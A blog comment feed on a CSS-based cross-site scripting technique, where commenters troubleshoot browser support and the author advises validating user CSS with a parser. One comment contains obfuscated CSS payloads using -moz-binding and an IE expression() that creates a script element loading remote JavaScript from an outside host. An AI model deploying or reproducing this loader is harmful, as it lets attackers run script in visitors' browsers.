Comments on: Ultimate XSS CSS injection http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/ A tool for designers dealing with programmers dealing with designers... Tue, 16 Mar 2010 17:32:59 +0000 http://wordpress.org/?v=2.6.2 By: Gareth Heyes http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1681 Gareth Heyes Wed, 13 Jan 2010 13:23:03 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1681 @sim Validate the CSS using a CSS parser like anti-samy @sim

Validate the CSS using a CSS parser like anti-samy

]]> By: sim http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1680 sim Wed, 13 Jan 2010 04:43:20 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1680 how can you stop people from writing these type of attacks to a css file when allowing people to write there own css files on your server? how can you stop people from writing these type of attacks to a css file when allowing people to write there own css files on your server?

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1332 Gareth Heyes Thu, 09 Oct 2008 20:03:01 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1332 Yeah it's fixed in FF3 final, I think the beta it was still in but they removed it :( I thought it was possible to do it inline but Giorgio mentioned it's only available in chrome :( Yeah it’s fixed in FF3 final, I think the beta it was still in but they removed it :(

I thought it was possible to do it inline but Giorgio mentioned it’s only available in chrome :(

]]> By: Vinicius K-Max http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1331 Vinicius K-Max Thu, 09 Oct 2008 19:16:13 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1331 Firefox 3 fixed this xml hole? Firefox 3 fixed this xml hole?

]]> By: yasir http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1295 yasir Tue, 02 Sep 2008 04:59:21 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1295 coo000lllL :::::::: good work coo000lllL :::::::: good work

]]> By: no.connexion http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1092 no.connexion Sun, 20 Jan 2008 03:02:41 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1092 Please take a look in here: hxxp://noconnexion.wordpress.com/ Please take a look in here:
hxxp://noconnexion.wordpress.com/

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1090 Gareth Heyes Fri, 18 Jan 2008 15:57:58 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1090 Yep tested on IE and Firefox Yep tested on IE and Firefox

]]> By: no.connexion http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1089 no.connexion Fri, 18 Jan 2008 15:55:35 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1089 I guess I was using the converted version in my css here: b { \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1); } I didn't use all the converted code for obvious reasons. Can you please confirm that you've done this through css and it works ? If yes I'll stop asking and I'll work my ass to make this work. I guess I was using the converted version in my css here:
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1);
}

I didn’t use all the converted code for obvious reasons. Can you please confirm that you’ve done this through css and it works ? If yes I’ll stop asking and I’ll work my ass to make this work.

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1088 Gareth Heyes Fri, 18 Jan 2008 15:30:42 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1088 @no.connexion Dude you need to run "convert" in Hackvertor first before adding it to the page. @no.connexion

Dude you need to run “convert” in Hackvertor first before adding it to the page.

]]> By: no.connexion http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1087 no.connexion Fri, 18 Jan 2008 14:50:40 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1087 Thanks for response. Here are my final thoughts. Added in html the following: ... <style type="text/css"> @import url(http://www.example.com/css/test.css); </style> </head> <body> <b> This IS a test </b> </body> ... and the in test.css: ... b { \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);<@hex_ent>xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<@tocharcodes>http://businessinfo.co.uk/labs/xss/xss.js<@/tocharcodes>));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;')<@/hex_ent> : 1); } ... OR in test.css b { \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1); } AND it works fine for Firefox but IE70 does nothing. I'm using 7.0.5730.13. Thanks for response.
Here are my final thoughts.
Added in html the following:


<style type=”text/css”>
@import url(http://www.example.com/css/test.css);
</style>
</head>
<body>
<b> This IS a test </b>
</body>

and the in test.css:

b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);<@hex_ent>xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(’x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<@tocharcodes>http://businessinfo.co.uk/labs/xss/xss.js<@/tocharcodes>));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’)<@/hex_ent> : 1);
}

OR

in test.css
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1);
}

AND it works fine for Firefox but IE70 does nothing. I’m using 7.0.5730.13.

]]>